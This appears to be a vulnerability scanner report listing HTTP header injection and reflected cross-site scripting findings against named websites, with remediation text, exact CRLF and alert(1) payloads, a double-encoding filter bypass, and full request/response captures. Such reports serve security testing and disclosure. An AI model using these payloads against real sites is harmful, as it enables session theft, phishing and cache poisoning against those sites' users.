HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
1.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://50.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 914c0%0d%0a5ae8a0d6760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&914c0%0d%0a5ae8a0d6760=1 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:31:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0cb9eb0e-696a-22c8-5249-00007193de3f; expires=Fri, 18-Feb-2011 03:31:19 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx?914c0
5ae8a0d6760=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload 4c016%0d%0a04bb2c362b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx4c016%0d%0a04bb2c362b6 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:31:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=555531e9-31c0-9dc9-aa49-0000346e4fb7; expires=Fri, 18-Feb-2011 03:31:16 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx4c016
04bb2c362b6
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the Location response header. The payload 65bc6%0d%0a7e707f3a9da was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload ae7c8%0d%0a3218649ce4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload b8b0f%0d%0a3bcadb1b34c was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the code request parameter is copied into the Location response header. The payload 32c9e%0d%0a01ddaa8666 was submitted in the code parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload dc9f3%0d%0a23628b7f9c8 was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of the N cookie is copied into the Set-Cookie response header. The payload 1b57e%0d%0a47dfc6b5cfd was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js HTTP/1.1
Host: anrtx.tacoda.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TID=16e8oqe01cg8de; Anxd=x; N=2:fd178a2029727e2044734a1f872c09cd,fd178a2029727e2044734a1f872c09cd1b57e%0d%0a47dfc6b5cfd; TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; Tsid=0^1290207076^1290208930|16728^1290207076^1290208930|18251^1290207125^1290208925; ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925;
Response
HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:45:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 20 Nov 2010 00:00:29 GMT
Set-Cookie: ANRTT=50212^1^1290640895|50220^1^1290640895|60183^1^1290811930|50216^1^1290811885|50229^1^1290811894|60185^1^1290811925; path=/; expires=Fri, 26-Nov-10 23:45:29 GMT; domain=.tacoda.net
Set-Cookie: Tsid=; path=/; expires=Thu, 19-Nov-09 23:45:29 GMT; domain=.tacoda.net
Set-Cookie: TData=99999|^|50085|54057|60490|#|50212|50220|60183|50216|50229|60185; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net
Set-Cookie: Anxd=x; expires=Sat, 20-Nov-10 05:45:29 GMT; path=/; domain=.tacoda.net
Set-Cookie: N=2:fd178a2029727e2044734a1f872c09cd1b57e
47dfc6b5cfd,fd178a2029727e2044734a1f872c09cd; expires=Mon, 14-Nov-11 23:45:29 GMT; path=/; domain=.tacoda.net
Content-Length: 90
Keep-Alive: timeout=60, max=965
Connection: Keep-Alive
Content-Type: application/x-javascript
var ANUT=1; var ANOO=0; var ANSR=0; var ANTID='16e8oqe01cg8de'; var ANSL; ANRTXR();
The value of the si request parameter is copied into the Set-Cookie response header. The payload 2317e%0d%0a6638b1327e8 was submitted in the si parameter. This caused a response containing an injected HTTP header.
The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.
The value of the goto request parameter is copied into the Location response header. The payload 794ac%0d%0a4d3881665ea was submitted in the goto parameter. This caused a response containing an injected HTTP header.
Request
GET /amserver/UI/Login?realm=dotnet&module=AIAWN&goto=794ac%0d%0a4d3881665ea HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=webmail; JSESSIONID=2D7E445097FDA183EEB1FF24695BC505; amlbcookie=02; AMAuthCookie=LOGOUT; POPRefid=refid=&refresh=y&reftrytime=0&refnum=;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://abc.go.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://abc.go.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80597"%3balert(1)//8ad75bcf9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80597";alert(1)//8ad75bcf9ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?80597"%3balert(1)//8ad75bcf9ec=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 97885
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 19 Nov 2010 23:38:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=FE2AB8A7-AB90-4FDD-9541-F9BB3ED0890A; path=/; expires=Fri, 19-Nov-2030 23:38:22 GMT; domain=.go.com;
Cache-Expires: Fri, 19 Nov 2010 23:53:22 GMT
Date: Fri, 19 Nov 2010 23:38:22 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/schem ...[SNIP]... bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?80597";alert(1)//8ad75bcf9ec=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bfc"%3bc758afbe8ca was submitted in the REST URL parameter 1. This input was echoed as d9bfc";c758afbe8ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkd9bfc"%3bc758afbe8ca/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.592896; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:35 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworkd9bfc";c758afbe8ca"; s_265.prop2="aol_pp"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e0"%3b62d3162371a was submitted in the REST URL parameter 1. This input was echoed as 5b6e0";62d3162371a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork5b6e0"%3b62d3162371a/aolcom_terms HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.1124666368; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:38 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10547
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork5b6e0";62d3162371a"; s_265.prop2="aolcom_terms"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 866c5"%3bc2c3419ad15 was submitted in the REST URL parameter 1. This input was echoed as 866c5";c2c3419ad15 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork866c5"%3bc2c3419ad15/copyright_infringement HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.2198408192; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:40 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10567
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork866c5";c2c3419ad15"; s_265.prop2="copyright_infringement"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ebc"%3b89a48e93d80 was submitted in the REST URL parameter 1. This input was echoed as 43ebc";89a48e93d80 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork43ebc"%3b89a48e93d80/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.269028352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:36 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ln31 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ln31.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork43ebc";89a48e93d80"; s_265.prop2="trademarks"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83291%2522%253b5bb1d8c030d was submitted in the authLev parameter. This input was echoed as 83291";5bb1d8c030d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /opr/_cqr/opr/opr.psp?sitedomain=sns.webmail.aol.com&authLev=083291%2522%253b5bb1d8c030d&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Awebmail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AAOL%7Csnt%3AScreenName%7Csid%3Ab8f0c4b0-0c85-446d-b863-b15687c1024d&lang=en&locale=us&offerId=newmail-en-us-v2&seamless=novl HTTP/1.1
Host: account.login.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.0 200 OK
Date: Fri, 19 Nov 2010 23:39:11 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2920
Connection: close
The value of the clk0 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5546"%3balert(1)//a772291970e was submitted in the clk0 parameter. This input was echoed as b5546";alert(1)//a772291970e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the clk0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f766a"><script>alert(1)</script>38e82e8f2db was submitted in the clk0 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d29'-alert(1)-'825c464d51d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.10. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://vulnerable.verizon.host
Path: /adi/N3405.Sympatico.ca/B5011284.3
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ebe8"-alert(1)-"51601b54316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6974
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... e=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1http%3a%2f%2frbc.bridgetrack.com/bank/_redir.htm%3FBTData%3D6021A7B776679675D54424BB7A2A5AFA09E9D9F81FEFBF8F3F4C2A01B149%26BT_TRF%3D11030%26ASC%3DAD0028"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e0da"-alert(1)-"8fdfe6c6257 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6899
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... be=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257http://rbc.bridgetrack.com/bank/_redir.htm?BTData=6021A7B776679675D54424BB7A2A5AFA09C9D9F81FEFBF8F3F4C2AE0B149&BT_TRF=11030&ASC=AD0033"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
2.12. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
